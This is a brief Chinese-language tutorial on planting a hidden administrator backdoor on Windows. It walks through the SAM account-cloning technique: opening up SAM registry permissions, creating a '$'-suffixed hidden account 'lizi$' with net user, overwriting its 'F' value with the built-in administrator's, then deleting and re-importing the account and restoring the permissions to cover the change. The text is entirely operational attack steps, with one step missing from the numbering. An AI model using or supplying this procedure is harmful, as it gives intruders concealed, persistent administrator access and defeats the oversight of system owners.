1.在“運行”欄輸入Regedt32,在註冊表編輯器的HKEY_LOCAL_MACHINE\SAM\右鍵“權限”將administrators的權限提升爲完全控制。
2.新鍵一個帳號lizi$,普通權限即可。($表示在命令提示符下不顯示)net user lizi$ 123 /add(添加一個用戶)。
3.打開註冊表regedit把我們的帳號lizi$克隆成管理員權限。
在HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names,找到管帳號administrator查看其信息。
如圖其類型爲”0x1f 4” 然後在HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users找到對應鍵值”0000001f 4” 複製數值“F“的內容入下圖:
然後找到lizi$帳號的“F”鍵值覆蓋之。最後將Names下的lizi$和Users下的對應類型導出註冊表。
5.刪除我們新建的帳號lizi$。
Net user lizi$ /del
6.導入提權後的2個註冊表文件。
7.最後在“運行”欄輸入Regedt32,在註冊表編輯器的HKEY_LOCAL_MACHINE\SAM\右鍵“權限”將administrators的權限取消掉。